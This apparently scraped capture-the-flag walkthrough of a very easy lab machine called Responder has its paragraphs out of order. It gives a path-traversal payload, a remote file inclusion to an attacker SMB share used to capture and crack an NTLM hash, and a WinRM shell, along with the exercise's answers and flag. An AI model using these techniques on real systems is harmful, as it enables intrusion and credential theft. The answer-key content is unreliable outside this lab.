Responder (Tier 1)
Last updated
Was this helpful?
Last updated
Was this helpful?
Tier -> 1
Difficult -> Very Easy
OS -> Linux
Tags -> WinRM / Custom Applications / Protocols / XAMPP / SMB / Responder / PHP / Reconnaissance / Password Cracking / Hash Capture / Remote File Inclusion / Remote Code Execution
Then I did an exhaustive scan to get more information about the service running on the open port
I found the HTTP protocol running on port 80, so I went to the browser to check the content being deployed. Hitting the site using the IP redirected me to a domain named unika.htb, but I was unable to reach the server
With this, I answered the first question
Answer: unika.htb
The reason why the page didn't show me content was that it wasn't on my list of known hosts. To fix this I added it by modifying the /etc/hosts file, relating the IP to the unika.htb domain. After that, I hit the site again, and it worked properly
With this, I answered the next question
Answer: php
Navigating to the top right corner I found a slider to select the language of the page which caught my attention. When I selected a different language from english, the language of the whole page changed and the URL showed a query reflecting this action
With this, I answered the next question
Answer: page
To test if this query could be vulnerable to a Local File Inclusion attack, I tried listing the contents of the /etc/hosts file by changing the value of the page parameter. After some tries, I found a successful payload and displayed the content of the asked file
With this and a little research, I answered some questions
Answer: ../../../../../../../../windows/system32/drivers/etc/hosts
Answer: //10.10.14.6/somefile
Answer: New Technology Lan Manager
Answer: -I
Answer: John The Ripper
After that, I initialized the tool specifying the network interface I wanted to use, in this case, the tun0 interface
Then I went to the vulnerable endpoint again to modify the URL and tried to do in this case a Remote File Inclusion to my machine, to connect to the Responder server I had deployed. With this action, the page displayed an error but when checking the terminal, Responder had caught the credentials of the target
With this and a little research, I answered the next questions
Answer: badminton
Answer: 5985
Having these credentials, I could try to connect to the system directly. For this purpose, I used the evil-winrm tool to try to get a shell and it worked successfully
Searching through the system, I found a file called flag.txt in the C:\Users\mike\Desktop folder. Finally, I checked the content of the flag.txt file, retrieving the flag
With this, I got the root flag and pwned the machine
Answer: ea81b7afddd03efaa0945333ed147fac
I started doing an initial scan using
To learn more about the HTTP protocol you can go
Once there, I found a dashboard page for a business with some buttons which didn't work. Exploring the page I didn't find anything relevant so I used the extension to get some extra information about the technologies of the site
To learn more about Local File Inclusion exploitation you can go
Knowing that I could abuse this, I tried using the utility to intercept the communication between the web server and the local system. That was to try to catch the credentials for the internal SMB service, based on the fact that it was a Windows system and could be running it. I started configuring the tool, so I modified the Responder.config file to set the value SMB to On
To learn more about Remote File Inclusion exploitation you can go
I caught the communication from the Administrator user and the corresponding hash, so I saved it in a text file. I could try to break the hash using the tool and the well-known rouckyou.txt dictionary. After running it, I observed the cracking process was successful, obtaining the password badminton for the user Administrator
